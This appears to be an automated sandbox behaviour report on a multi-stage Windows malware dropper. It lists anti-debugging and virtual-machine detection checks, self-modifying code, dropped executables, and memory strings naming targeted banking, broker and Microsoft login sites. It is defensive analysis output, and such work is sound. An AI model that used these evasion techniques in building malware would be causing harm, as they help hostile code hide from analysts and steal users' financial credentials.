                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3042F second address: 4D304A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, edx 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD3A47FEE93h 0x00000015 adc ecx, 5510F94Eh 0x0000001b jmp 00007FD3A47FEE99h 0x00000020 popfd 0x00000021 mov eax, 667CB957h 0x00000026 popad 0x00000027 push dword ptr [ebp+14h] 0x0000002a jmp 00007FD3A47FEE8Ah 0x0000002f push dword ptr [ebp+10h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FD3A47FEE97h 0x00000039 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D304A1 second address: 4D304B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A4D6CBA4h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D20153 second address: 4D20159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D20159 second address: 4D2015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D2015D second address: 4D20189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD3A47FEE94h 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D20189 second address: 4D201D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FD3A4D6CBA7h 0x00000016 adc ecx, 72D2D8DEh 0x0000001c jmp 00007FD3A4D6CBA9h 0x00000021 popfd 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D201D7 second address: 4D201F9 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD3A47FEE95h 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D201F9 second address: 4D201FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D10D26 second address: 4D10D4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD3A47FEE8Dh 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90B33 second address: 4D90B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A4D6CB9Ch 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90B43 second address: 4D90BA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD3A47FEE96h 0x00000011 push eax 0x00000012 jmp 00007FD3A47FEE8Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ch, bl 0x0000001d pushfd 0x0000001e jmp 00007FD3A47FEE8Ch 0x00000023 jmp 00007FD3A47FEE95h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90BA1 second address: 4D90BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80D50 second address: 4D80D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Special instruction interceptor: First address: 502905 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Special instruction interceptor: First address: 6B1E90 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Special instruction interceptor: First address: 6B2206 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Special instruction interceptor: First address: 50290B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Special instruction interceptor: First address: 7443D7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 782905 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 931E90 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 932206 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 78290B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 9C43D7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Special instruction interceptor: First address: 9E5ACD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Special instruction interceptor: First address: B9DB1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Memory allocated: 3010000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Memory allocated: 3200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Memory allocated: 5200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Code function: 2_2_04D90201 rdtsc 2_2_04D90201
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1040
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1067
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1514
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1233
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1068
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | Window / User API: threadDelayed 468
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\packed[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\T0QdO0l[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10123540101\packed.exe
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\han
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3E11p.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bncn6rv[1].exe
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uvwnwebboksg
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-2475
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_1-2577
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | API coverage: 0.9 %
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe TID: 5296 | Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe TID: 5296 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6712 | Thread sleep count: 1040 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6712 | Thread sleep time: -2081040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6696 | Thread sleep count: 1067 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6696 | Thread sleep time: -2135067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2204 | Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6140 | Thread sleep count: 1514 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6140 | Thread sleep time: -3029514s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5732 | Thread sleep count: 206 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5732 | Thread sleep time: -6180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1476 | Thread sleep count: 1233 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1476 | Thread sleep time: -2467233s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6720 | Thread sleep count: 1068 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6720 | Thread sleep time: -2137068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe TID: 2112 | Thread sleep time: -43992s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe TID: 5008 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe TID: 4412 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00FA2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Code function: 1_2_00922390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_00922390
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6120D0 _Open_dir,FindFirstFileExW,__Read_dir,FindClose, 17_2_6D6120D0
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00FA5467
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | File opened: C:\Users\user~1\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | File opened: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | File opened: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | File opened: C:\Users\user~1\AppData\
Source: rapes.exe, rapes.exe, 00000004.00000002.987189840.0000000000915000.00000040.00000001.01000000.00000009.sdmp, 2R0700.exe, 00000005.00000002.1210356284.0000000000B74000.00000040.00000001.01000000.0000000A.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: http://www.vmware.com/0
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.1!0
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 2R0700.exe, 2R0700.exe, 00000005.00000002.1209556432.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1097981161.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1209197653.0000000000661000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1127856691.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209718066.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1209017562.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.996393122.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.000000000065C000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1098466251.000000000069D000.00000004.00000020.00020000.00000000.sdmp, pwHxMTy.exe, 0000002E.00000002.2024766595.0000000001267000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: http://www.vmware.com/0/
Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.1
Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.0
Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                              Source: 2R0700.exe, 00000005.00000003.1028692054.00000000054B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                              Source: SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                              Source: 1E08u3.exe, 00000002.00000003.914010343.00000000011AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                              Source: pwHxMTy.exe, 0000002E.00000002.2024766595.0000000001267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                              Source: 1E08u3.exe, 00000002.00000002.944674073.0000000000695000.00000040.00000001.01000000.00000005.sdmp, rapes.exe, 00000003.00000002.982468031.0000000000915000.00000040.00000001.01000000.00000009.sdmp, rapes.exe, 00000004.00000002.987189840.0000000000915000.00000040.00000001.01000000.00000009.sdmp, 2R0700.exe, 00000005.00000002.1210356284.0000000000B74000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                              Source: 2R0700.exe, 00000005.00000003.1028858831.00000000054A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe Code function: 2_2_04D90201 rdtsc 2_2_04D90201
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_009F1BA5 IsDebuggerPresent,OutputDebugStringW, 17_2_009F1BA5
